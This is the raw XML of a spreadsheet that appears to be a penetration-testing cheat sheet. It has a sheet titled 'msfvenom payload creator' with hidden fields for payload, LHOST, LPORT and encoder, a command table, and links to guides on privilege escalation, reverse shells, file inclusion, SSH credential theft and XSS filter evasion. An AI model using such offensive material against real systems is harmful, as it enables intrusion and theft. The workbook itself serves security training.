      <xdr:spPr>
        <a:xfrm>
          <a:off x="18942050" y="793750"/>
          <a:ext cx="1200150" cy="5778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6</xdr:col>
      <xdr:colOff>25400</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>469900</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>6350</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>260350</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="7" name="Rectangle 6">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0600-000007000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="17252950" y="1847850"/>
          <a:ext cx="1200150" cy="5778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8</xdr:col>
      <xdr:colOff>527050</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>482600</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>508000</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>273050</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="8" name="Rectangle 7">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0600-000008000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="18973800" y="1860550"/>
          <a:ext cx="1200150" cy="5778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19050</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>12700</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26628" name="PayloadBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26628"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-000004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0</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>13</xdr:col>
      <xdr:colOff>450850</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>273050</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26629" name="LHOSTBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26629"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-000005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15</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>16</xdr:col>
      <xdr:colOff>603250</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>273050</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26630" name="LPORTBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26630"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-000006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18</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>19</xdr:col>
      <xdr:colOff>603250</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>6350</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26632" name="PlatformBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26632"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-000008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0</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>13</xdr:col>
      <xdr:colOff>469900</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>6350</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26634" name="EncoderBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26634"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-00000A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12</xdr:col>
      <xdr:colOff>241300</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>13</xdr:col>
      <xdr:colOff>596900</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26635" name="IterationsBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26635"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-00000B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18</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>19</xdr:col>
      <xdr:colOff>603250</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>273050</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26636" name="ArchBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26636"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-00000C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0</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>12700</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>13</xdr:col>
      <xdr:colOff>450850</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>12700</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26637" name="BadCharsBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26637"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-00000D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15</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>16</xdr:col>
      <xdr:colOff>603250</xdr:colOff>
      <xdr:row>15</xdr:row>
      <xdr:rowOff>107950</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26638" name="FormatBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26638"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-00000E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18</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>19</xdr:col>
      <xdr:colOff>603250</xdr:colOff>
      <xdr:row>15</xdr:row>
      <xdr:rowOff>88900</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26640" name="OutFileBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26640"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-000010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19050</xdr:colOff>
      <xdr:row>21</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>12</xdr:col>
      <xdr:colOff>6350</xdr:colOff>
      <xdr:row>23</xdr:row>
      <xdr:rowOff>12700</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26642" name="Copy_msf_command" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26642"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-000012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454275</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>1</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>175852</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>175847</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="5" name="Picture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4275" y="1"/>
          <a:ext cx="937846" cy="937846"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>10</xdr:col>
      <xdr:colOff>19050</xdr:colOff>
      <xdr:row>25</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>12</xdr:col>
      <xdr:colOff>6350</xdr:colOff>
      <xdr:row>27</xdr:row>
      <xdr:rowOff>12700</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26643" name="CommandButton1" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26643"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-000013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410307</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>102578</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>359019</xdr:colOff>
      <xdr:row>19</xdr:row>
      <xdr:rowOff>490</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="7" name="Picture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8442" y="1553309"/>
          <a:ext cx="3011365" cy="2347546"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>512602</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>80596</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6250429" cy="655885"/>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="10" name="Rectangle 9">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-00000A000000}"/>
            </a:ext>
          </a:extLst>
        </xdr:cNvPr>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1120737" y="80596"/>
          <a:ext cx="6250429" cy="655885"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
            <a:prstClr val="black">
              <a:alpha val="40000"/>
            </a:prstClr>
          </a:outerShdw>
        </a:effectLst>
      </xdr:spPr>
      <xdr:txBody>
        <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
          <a:spAutoFit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="en-US" sz="3600" b="0" cap="none" spc="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:srgbClr val="0D78B9"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                  <a:srgbClr val="6E747A">
                    <a:alpha val="43000"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:rPr>
            <a:t>MSFVENOM PAYLOAD CREATOR</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="3600" b="0" cap="none" spc="0">
            <a:ln w="0"/>
            <a:solidFill>
              <a:srgbClr val="0D78B9"/>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="6E747A">
                  <a:alpha val="43000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </a:endParaRPr>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:oneCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>15</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>16</xdr:col>
      <xdr:colOff>603250</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>6350</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="26645" name="NOPBox" hidden="1">
          <a:extLst>
            <a:ext uri="{63B3BB69-23CF-44E3-9099-C40C66FF867C}">
              <a14:compatExt xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" spid="_x0000_s26645"/>
            </a:ext>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00000000-0008-0000-0F00-000015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gtfo.bi">
  <extLst>
    <x:ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{2F2917AC-EB37-4324-AD4E-5DD8C200BD13}">
      <x15:tableSlicerCache tableId="7" column="1"/>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S" xr10:uid="{00000000-0013-0000-FFFF-FFFF02000000}" sourceName="OS">
  <extLst>
    <x:ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{2F2917AC-EB37-4324-AD4E-5DD8C200BD13}">
      <x15:tableSlicerCache tableId="7" column="2"/>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ol_lang" xr10:uid="{00000000-0013-0000-FFFF-FFFF03000000}" sourceName="tool/lang/tech">
  <extLst>
    <x:ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{2F2917AC-EB37-4324-AD4E-5DD8C200BD13}">
      <x15:tableSlicerCache tableId="7" column="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ent" xr10:uid="{00000000-0013-0000-FFFF-FFFF04000000}" sourceName="Category 2">
  <extLst>
    <x:ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{2F2917AC-EB37-4324-AD4E-5DD8C200BD13}">
      <x15:tableSlicerCache tableId="7" column="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_3" xr10:uid="{00000000-0013-0000-FFFF-FFFF05000000}" sourceName="Category 3">
  <extLst>
    <x:ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{2F2917AC-EB37-4324-AD4E-5DD8C200BD13}">
      <x15:tableSlicerCache tableId="7" column="5"/>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vice" xr10:uid="{00000000-0013-0000-FFFF-FFFF06000000}" sourceName="Service">
  <extLst>
    <x:ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{2F2917AC-EB37-4324-AD4E-5DD8C200BD13}">
      <x15:tableSlicerCache tableId="7"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gtfo.bi" columnCount="2" style="SlicerStyleLight1" rowHeight="241300"/>
  <slicer name="Operating system" xr10:uid="{00000000-0014-0000-FFFF-FFFF02000000}" cache="Slicer_OS" caption="Operating system" columnCount="2" style="SlicerStyleLight2" rowHeight="241300"/>
  <slicer name="Tool or Language" xr10:uid="{00000000-0014-0000-FFFF-FFFF03000000}" cache="Slicer_tool_lang" caption="Tool or Language" columnCount="4" style="SlicerStyleLight6" rowHeight="241300"/>
  <slicer name="Intent" xr10:uid="{00000000-0014-0000-FFFF-FFFF04000000}" cache="Slicer_Intent" caption="Category 2" columnCount="3" style="SlicerStyleOther2" rowHeight="241300"/>
  <slicer name="Category 3" xr10:uid="{00000000-0014-0000-FFFF-FFFF05000000}" cache="Slicer_Category_3" caption="Category 3" startItem="32" columnCount="4" style="SlicerStyleLight4" rowHeight="241300"/>
  <slicer name="Service" xr10:uid="{00000000-0014-0000-FFFF-FFFF06000000}" cache="Slicer_Service" caption="Service" columnCount="24" style="SlicerStyleDark1" rowHeight="39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0000000}" name="Table48" displayName="Table48" ref="A26:I587" totalsRowShown="0" headerRowDxfId="12" dataDxfId="10" headerRowBorderDxfId="11" tableBorderDxfId="9">
  <autoFilter ref="A26:I587" xr:uid="{00000000-0009-0000-0100-000007000000}">
    <filterColumn colId="0" hiddenButton="1"/>
    <filterColumn colId="1" hiddenButton="1"/>
    <filterColumn colId="2" hiddenButton="1"/>
    <filterColumn colId="3" hiddenButton="1"/>
    <filterColumn colId="4" hiddenButton="1"/>
    <filterColumn colId="5" hiddenButton="1"/>
  </autoFilter>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A27:F676">
    <sortCondition ref="A27:A676"/>
    <sortCondition ref="D27:D676"/>
    <sortCondition ref="C27:C676"/>
  </sortState>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="gtfo.bi" dataDxfId="8"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="OS" dataDxfId="7"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="tool/lang/tech" dataDxfId="6"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0000-000004000000}" name="Category 2" dataDxfId="5"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0000-000005000000}" name="Category 3" dataDxfId="4"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0000-000008000000}" name="Service" dataDxfId="3"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0000-000006000000}" name="Command" dataDxfId="2"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0000-000007000000}" name="Comment" dataDxfId="1"/>
    <tableColumn id="9" xr3:uid="{00000000-0010-0000-0000-000009000000}" name="Keyword"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github.com/mschwager/fierceIn%20this%20example%20we%20are%20just%20usuing%20fierce's%20host%20name%20list%20in%20a%20script" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.restapitutorial.com/httpstatuscodes.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ratiros01/tryhackme-lfi-basics-1c8194f30c61" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.kali.org/information-gathering/dotdotpwn%0a%0awe%20can%20use%20dot%20dot%20pwn%20to%20automate%20this%20lel" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.pentesteracademy.com/socks4-proxy-pivoting-by-metasploit-74436b45392a" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.contextis.com/en/blog/linux-privilege-escalation-via-dynamically-linked-shared-object-libraryCheck%20the%20above%20link%20for%20the%20full%20process." TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdn.members.elearnsecurity.com/ptp_v5/section_2/module_1/attachment/eLearnSecurity_Handling_Information.pdf" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.htmlUse%20the%20below%20to%20bypass%20upload%20file%20extension%20restrictions" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.microsoft.com/office/2007/relationships/slicer" Target="../slicers/slicer1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/laudanum/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudflare.com/en-au/learning/dns/dns-records/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.lucideus.com/2018/05/getting-meterpreter-shell-with-sqlmap.html%0a%0ahttps:/null-byte.wonderhowto.com/how-to/use-sql-injection-run-os-commands-get-shell-0191405/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mthbernardes.github.io/persistence/2018/02/10/stealing-ssh-credentials-another-approach.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/hacker-toolbelt/dvwa-1-9-vi-file-upload-ce77a73b0453" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/local-file-inclusion-code-execution/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/huntergregal/mimipenguin" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/exploit-remote-file-inclusion-get-shell-0187006/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.darkoperator.com/blog/2014/1/29/enumeration-using-the-meterpreter-adsi-extended-api-commands" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/schkn/linux-privilege-escalation-using-text-editors-and-files-part-1-a8373396708d" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sqltutorial.org/sql-cheat-sheet/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sushant747.gitbooks.io/total-oscp-guide/content/reverse-shell.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/pyperanger/dockerevil" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://buffered.io/posts/staged-vs-stageless-handlers/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netsec.ws/?p=278" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/xss-filter-evasion-cheatsheetIF%20%3cscript%3e%3c/script%3e%20does%20not%20work%20just%20try%20%3cimg%20src%20=%20page/%20Javascript%20function%20i.e.%20Javascript:alert('XSS');%22%3e" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/bypass-uac-escalate-privileges-windows-using-metasploit-0196076/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://superuser.com/questions/322423/explain-the-output-of-icacls-exe-line-by-line-item-by-item" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings1.bin"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0x36/VPNPivot" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/"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www.reddit.com/r/oscp/comments/c698qx/what_do_you_do_when_your_bof_shellcode_does_not/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 